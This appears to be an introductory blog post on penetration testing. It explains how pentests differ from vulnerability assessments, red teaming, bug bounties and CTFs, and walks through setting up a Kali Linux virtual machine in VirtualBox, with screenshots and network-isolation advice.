&lt;p&gt;As mentioned before, no network, application or system is a fortress. If you check the number of new vulnerabilities published every year, the count is &lt;a href="https://meterpreter.org/2020-vulnerability-and-threat-trends-report-the-number-of-cves-will-hit-a-new-high/" rel="noopener noreferrer"&gt;always increasing and breaking new records&lt;/a&gt;. This makes it impossible to protect an asset against every vulnerability it is susceptible to, but asset owners can &lt;strong&gt;harden&lt;/strong&gt; their defenses against them. The cost of a successful cyberattack can be enormous: not only money, but also client trust and brand strength. Quoting a book that I really like, which investigates the legal and economic aftermath of a cybersecurity breach, &lt;strong&gt;you'll only see this message when it is too late.&lt;/strong&gt; Small and medium businesses may never get the chance to be "too late"; a breach can cost the whole business, especially in light of the CNBC findings &lt;a href="https://www.cnbc.com/2019/10/13/cyberattacks-cost-small-companies-200k-putting-many-out-of-business.html" rel="noopener noreferrer"&gt;that 43% of attacks are aimed at small businesses, but only 14% are prepared to defend themselves&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;A penetration tester can expose security holes in the company's protective shell and provide an overall diagnosis of its security layers. This usually leads to reinforcement and improvement of compliance, of the defensive mindset and of the security procedures inside the company.&lt;/p&gt;

&lt;h1&gt;
  
  
  How often should I implement a Penetration Test?
&lt;/h1&gt;

&lt;p&gt;As you have already seen, the number of new vulnerabilities is sky-rocketing and breaks new records every year, so performing a penetration test at least once a year should be a regular practice for companies, both to raise their security baseline and to re-evaluate the health of their security mechanisms. Beyond that, a new pentest should ideally be performed every time a company adds:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;New network infrastructure&lt;/li&gt;
&lt;li&gt;New application launches&lt;/li&gt;
&lt;li&gt;New offices (especially in new locations)&lt;/li&gt;
&lt;li&gt;New major patches or updates&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This does not apply equally to every company; it usually depends on its online presence, the share of budget allocated to security (if any) and its infrastructure. Note that a company that keeps most of its infrastructure with a cloud provider cannot test the provider's underlying platform, which stays covered by the provider's own assessments, and must follow the provider's penetration-testing policy (most major providers let customers test their own resources without prior approval, but only within published rules of engagement). Everything the company deploys on top of that platform is its own responsibility and should still be tested.&lt;/p&gt;

&lt;h1&gt;
  
  
  The difference between penetration test and vulnerability assessment/red teaming/bug bounty/CTF
&lt;/h1&gt;

&lt;p&gt;Now that you know the basic concepts of a Penetration Test, it is important to distinguish it from some related security practices. Confusing these procedures can lead to wasted spending and to misleading results, leaving the company with a wrong evaluation of its security posture and assets. For small and medium businesses, these common misconceptions can burn the security budget (or be too expensive to even be considered for it) and still leave holes in the company's shell. So, finally, what do all those terms mean?&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Penetration Test&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A Penetration Test is the process in which the pentester assesses a target in order to bring its vulnerabilities to light and exploit them. The &lt;strong&gt;main objective&lt;/strong&gt; is to observe the network/system/application through the eyes of a malicious actor, overcome its defenses and evaluate the health of that asset's security posture, providing detailed information on its attack surface, its vulnerabilities and their severity, and how the defensive mechanisms and teams react. Think of pentesters as Mongol riders: loud, attacking everything they can and leaving plenty of tracks.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Vulnerability Assessment&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A Vulnerability Assessment is the process in which the target is tested, usually with automated scanners plus an array of manual checks, in order to understand and evaluate the security of the assets without necessarily exploiting what is found. Unlike pentests, Vulnerability Assessments should be frequent, in order to keep the asset's defenses current and shrink its attack surface, especially when new vulnerabilities affecting the services or applications used in the target network/application/system are released (and, as you remember, they pop up almost every day!).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Red Teaming&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If a Penetration Test is a Mongol rider attack, Red Teaming is a long campaign of ninja attacks. A Red Teaming assessment is a more focused, stealthy operation aimed at testing the company's security controls across its human, technological and physical assets. After Vulnerability Assessments and Penetration Tests have been performed, a company with a more mature approach to security can stress and benchmark its detection and response with a Red Teaming assessment, involving not only the technological aspects covered by a penetration test, but also physical components (premises, computers, telephones, peripherals) and people, via social engineering.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Bug Bounty Program&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Bug bounty programs are usually run by companies with a larger security budget and a refined cybersecurity strategy, in order to continuously test their endpoints and applications. A bug bounty program scales well because of its pay-per-vulnerability model (in contrast to the pay-for-time model of a Penetration Test) and because of crowdsourced platforms such as Bugcrowd, HackerOne and Intigriti. An outstanding advantage is that it brings the perspectives of many different security researchers, and this multicultural, multifaceted approach produces different ways of exploiting an asset, giving the assessment a more real-world touch (clearly an advantage for companies with an intense worldwide internet presence).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;CTF&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Capture-the-Flag games (CTFs) are really good training for penetration testing skills, but they are not examples of real-world practice. A CTF usually consists of attacking a vulnerable-by-design target, finding its vulnerabilities, escalating privileges and finding "flags", pieces of text hidden inside the target. Once you have found the flags, your job is done. That is not how a pentest goes: there you need post-exploitation, you need to find the information that actually matters inside the exploited target (not just flags) and you need to test every way you can find to breach the asset (whereas in a CTF you are after that &lt;strong&gt;one&lt;/strong&gt; way to exploit the target and grab the flags in the shortest time possible). Still, nobody doubts how effective these games are at improving hacking skills, which makes them a good way to get more people into the minutiae of security attacks, even if they never become penetration testers.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h1&gt;
  
  
  Setting Up a Pentesting Lab
&lt;/h1&gt;

&lt;p&gt;You read about pentesting, understood its concepts and got a brief explanation on other security fields related to that. So, what's next? If you thought "It's time to learn the practicalities of it myself", then you're right! But, before you start practicing in a controlled environment (remember, pentesting a live target without permission is considered a crime), you need to set up your lab, and that's what we are going to do right now.&lt;/p&gt;

&lt;p&gt;The first thing you need to settle is your operating system. When it comes to Penetration Testing there are multiple options, but the two most popular are Kali Linux and ParrotOS. Both are Debian-based Linux distributions, available for 32-bit and 64-bit architectures, with outstanding out-of-the-box support for pentest-related tools that are going to make your life easier. Just install one of them, find a legal practice target and start hacking! No need to install dozens of tools (though a few extras are a nice addition if you have minutes to spare), no need to spend a lot of time configuring things... They are already there!&lt;/p&gt;

&lt;p&gt;Once you get more experienced with all the tools you need to better fit your own Methodology, you can start looking for some other options out there, or even create one distribution yourself with every single thing that's necessary to get the job done! But right now I suggest you stick to one of those, for the reasons I explained before. You don't wanna spend a lot of time looking for installation tutorials for every single tool you need, when there's already something out there with all of those tools packed in a single box, ready for use! Before you pick Kali or Parrot, I suggest you take a look and research a bit about the difference between them, especially related to the system requirements. Kali might be a little more greedy, component-wise, but the final decision is up to you.&lt;/p&gt;

&lt;p&gt;One more thing: these are hacking-oriented operating systems, so you are going to handle all sorts of material there, which may include malware samples. It is therefore recommended that you run them in a Virtual Machine on top of your regular OS, so that whatever you detonate or misconfigure stays inside the guest. This approach is resource-intensive, requiring 8GB or more of your RAM. If you don't want to do that, no worries: you can still install one of those systems as your main one, but you need to be extra careful about what you do on it. Once again, the final decision is up to you, so before you commit, do your own research, think it through and then do whatever floats your boat!&lt;/p&gt;

&lt;h2&gt;
  
  
  Installing the Virtual Machine
&lt;/h2&gt;

&lt;p&gt;So let's get our hands dirty and start installing our tools! The first thing you'll need is a hypervisor to run the Virtual Machine. The best free options are VMware Workstation, which has a free-for-personal-use edition, and Oracle VM VirtualBox, which is free and open source. Once again, I recommend you do your own research to choose whatever is best for you, but for this post I'll stick to VirtualBox. It's my favorite of the two and I run it on every setup I use at home, basically because I got familiar with it during my degree and configuring a new machine on it feels natural to me. That being said, the first step is to visit their website at &lt;a href="https://www.virtualbox.org/wiki/Downloads" rel="noopener noreferrer"&gt;https://www.virtualbox.org/wiki/Downloads&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frwn095ccwmtloh3lqqi8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frwn095ccwmtloh3lqqi8.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Choose the platform package related to your host machine, then click on it and once the pop message shows up, save it. In my case, I'm on a Windows machine, so you might see something more or less like this:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsusxfxxuvv3bfksupczz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsusxfxxuvv3bfksupczz.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now it's downloaded, just click on the file and execute it. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fflzqg83i9c0i6f91exla.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fflzqg83i9c0i6f91exla.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Click on "Next" when prompted, until you reach the "Install" button. Then proceed to click on it as well, and wait for the installation wizard to complete its process.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn4dsow2619s973nmb2o7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn4dsow2619s973nmb2o7.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Once it's done, just open Virtual Box and you'll be ready for the next step!&lt;/p&gt;

&lt;h2&gt;
  
  
  Installing your Operating System
&lt;/h2&gt;

&lt;p&gt;For the purposes of this tutorial, we'll choose Kali Linux over ParrotOS, again for familiarity reasons. I've been working on Kali for a couple of years now and I'm just more used to it. However, in the past few months I've been closely watching ParrotOS release after release, and in the near future I might switch my main pentesting operating system, simply because its features and UX please me more than the latest Kali releases. That being said, let's head over to the Offensive Security website and download our Virtual Machine-ready Kali Linux release at &lt;a href="https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/" rel="noopener noreferrer"&gt;https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/&lt;/a&gt;, clicking on the VirtualBox Images tab (be careful not to click on the Kali Linux VMware Images tab!). Note that this tab gives you a ready-made appliance (an .ova file at the time of writing), which is imported with File → Import Appliance rather than installed; the manual VM-creation steps below are what you follow if you instead download the installer ISO from the Kali downloads page. Whichever you pick, verify the SHA256 sum published next to the download before you boot it: a tampered attack image is the worst possible starting point for a lab.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxz34mevyk4sayf1elyjb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxz34mevyk4sayf1elyjb.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Once you're done downloading the Kali image, let's configure it in the VirtualBox. Open VirtualBox and then click on &lt;strong&gt;New&lt;/strong&gt; on the top menu or in Machine → New (alternatively, you can also press Ctrl+N)&lt;strong&gt;.&lt;/strong&gt; &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh980n39yu6mkm0hv7tfx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh980n39yu6mkm0hv7tfx.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The "Name and Operating System" screen pops up with some pre-filled fields. It usually defaults to a Windows configuration, but we need to change it for our Kali image. In the &lt;strong&gt;Name&lt;/strong&gt; field you can write whatever you want; it is your identifier for this VM among all the Virtual Machines in your VirtualBox, so for organizational reasons let's call it &lt;strong&gt;Kali Linux&lt;/strong&gt;. In the &lt;strong&gt;Machine Folder&lt;/strong&gt; field select the folder where you want the VM's files and snapshots to be saved. For &lt;strong&gt;Type&lt;/strong&gt; select &lt;strong&gt;Linux&lt;/strong&gt;, and for Version &lt;strong&gt;Debian (64-bit)&lt;/strong&gt; or &lt;strong&gt;Debian (32-bit)&lt;/strong&gt;, matching the image you downloaded (a 64-bit host can run either). Once everything looks more or less like the screenshot below, hit Next.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8ecvgu6w3isleixqiw8x.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8ecvgu6w3isleixqiw8x.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Next is the Memory Size screen, where you select how much RAM to allocate to your Virtual Machine. If you can spare at least 8GB for Kali Linux, most things will run smoothly and you won't have much trouble. If you can't, I suggest you switch to ParrotOS or install Kali as a &lt;a href="https://www.kali.org/docs/usb/live-usb-install-with-windows/" rel="noopener noreferrer"&gt;LiveUSB&lt;/a&gt;. You can also run with less than 8GB, but it might get super slow and cranky halfway through your assessments. Once you have decided which option suits you best, hit Next and let's move to the next section.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6v8hywqxu9sszetxnwm5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6v8hywqxu9sszetxnwm5.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In the Hard Disk screen we just need to select &lt;strong&gt;Create a virtual hard disk now&lt;/strong&gt; and hit Create.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr78nbflfpuubp4w0p3a5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr78nbflfpuubp4w0p3a5.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This will pop up the Hard Disk File Type screen, and in this one we select VDI (VirtualBox Disk Image).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxwplayb17m48kw8hpwmz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxwplayb17m48kw8hpwmz.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The following section is the Storage on Physical Hard Disk screen, and in this one we'll select &lt;strong&gt;dynamically allocated&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbm21mwkazj1drtinyje0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbm21mwkazj1drtinyje0.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For the &lt;strong&gt;File Location and Size&lt;/strong&gt; screen, we gotta select how much of our actual hard disk will our Virtual Machine be able to use. I like to select 80GB, especially because Kali Linux already comes packed with most of the tools you need to do your job, so you won't be downloading new stuff like crazy. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhtfkzpydnolhqmtzns5h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhtfkzpydnolhqmtzns5h.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Once you click on create, the pop-up screen will fade and you'll be back on the home Virtual Machine menu.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcia9ynjc1iitlcrz8fey.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcia9ynjc1iitlcrz8fey.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;With the wizard completely done, let's click on Settings (Ctrl + S)&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0e32ixawgkepm7ajojhr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0e32ixawgkepm7ajojhr.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When the Settings screen pops up, click on General and then on Advanced, and change both the Shared Clipboard and Drag'n'Drop options to &lt;strong&gt;Bidirectional&lt;/strong&gt;. This is a convenience for day-to-day use (copying commands and notes between host and guest), but it is also a channel from the guest to the host, so set both back to &lt;strong&gt;Disabled&lt;/strong&gt; whenever you use this VM to handle malware samples.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnsgki9pqo7ozgvya0gbx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnsgki9pqo7ozgvya0gbx.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Then we change to the System tab on the left side menu, and then on the Motherboard tab we need to be sure to select only &lt;strong&gt;Hard Disk&lt;/strong&gt; and &lt;strong&gt;Optical&lt;/strong&gt; as boot options, and use the up and down arrows to make the boot order be: Hard Disk first and Optical second.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F882pxde7od0n2y4pcetg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F882pxde7od0n2y4pcetg.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Still in the System settings, we move to the Processor tab, set the processor count to &lt;strong&gt;2 CPU&lt;/strong&gt;s and tick &lt;strong&gt;Enable PAE/NX&lt;/strong&gt; under Extended Features.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F09vrh54yl0d8tpbfr14j.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F09vrh54yl0d8tpbfr14j.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Then in the Display settings we go to the Screen tab and move Video Memory all the way up to 128MB.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1uob7t9b3uca2c7mrwqy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1uob7t9b3uca2c7mrwqy.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In the Network settings we select the type of network connection our Virtual Machine will have, and there are three main options when it comes to pentesting: &lt;strong&gt;NAT&lt;/strong&gt;, &lt;strong&gt;Bridged&lt;/strong&gt; and &lt;strong&gt;Host-Only&lt;/strong&gt;. With NAT the guest sits in a private subnet behind your host, which acts like a home router: the VM can reach the outside world, but nothing outside can open a connection to the VM unless you add a port-forwarding rule in the adapter's settings, and guests on plain NAT cannot see each other either (VirtualBox's separate "NAT Network" mode is the one that puts several guests on a shared subnet).&lt;/p&gt;

&lt;p&gt;Host-Only, as the name implies, is reachable only from the host the VM runs on (and from other VMs on the same host-only adapter). This is the right setting for staying isolated from the outside world while you experiment on private test web servers or analyze malware, since the guest cannot reach the internet and therefore cannot call home to an attacker's infrastructure.&lt;/p&gt;

&lt;p&gt;Bridged puts your VM on the same network as your host, with its own address on the LAN, so it can be reached by every other computer on that network (and can reach them).&lt;/p&gt;

&lt;p&gt;Usually &lt;strong&gt;NAT&lt;/strong&gt; is fine for pentesting, but sometimes you need an exploit that connects back to your machine (a reverse shell, a listener waiting for a payload), and NAT will drop that inbound connection unless you forward the port. You can switch to &lt;strong&gt;Bridged&lt;/strong&gt; in that case, since it gives the VM a straightforward address on the outside network; just keep in mind that a bridged attack VM is visible to everything on your LAN, and that when the target is another VM on the same host, Host-Only is simpler and keeps the traffic off your network entirely.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy5laj0ciqir7sq62p5jx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy5laj0ciqir7sq62p5jx.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When you're done, click on OK and go back to the home menu. Your VM information will look more or less like this one&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F30hu7eo69m07oc0wmwfm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F30hu7eo69m07oc0wmwfm.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Then we click on &lt;strong&gt;Start&lt;/strong&gt; on the top menu, and it will pop up another screen, asking for you the select the start-up disk. Since we're going to use the Kali image we downloaded, click on the folder icon with the arrow up in front of it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Firlt5h4xdnzkv27noox6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Firlt5h4xdnzkv27noox6.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This opens a new pop-up, in which we click on &lt;strong&gt;Add&lt;/strong&gt; to add a new disk image. Navigate to where your installer ISO file is stored and select it. (If what you downloaded is the ready-made VirtualBox appliance rather than the ISO, you skip this step: import it with File → Import Appliance instead.)&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdv38oqso3tulrlbvfdwe.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdv38oqso3tulrlbvfdwe.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Once you've located your file, just hit &lt;strong&gt;Start&lt;/strong&gt; and the setup is done! Time to open your Kali machine and get started!&lt;/p&gt;

&lt;h1&gt;
  
  
  Building Your Pentest Methodology
&lt;/h1&gt;

&lt;p&gt;Before jumping into practice, let's agree on the structure of our penetration test. The individual steps you (and other penetration testers) take along the way may vary, but the overall structure is usually the same. You can find detailed information on &lt;a href="http://www.pentest-standard.org" rel="noopener noreferrer"&gt;pentest-standard.org&lt;/a&gt; and other sources, but I'll summarize it here:&lt;/p&gt;

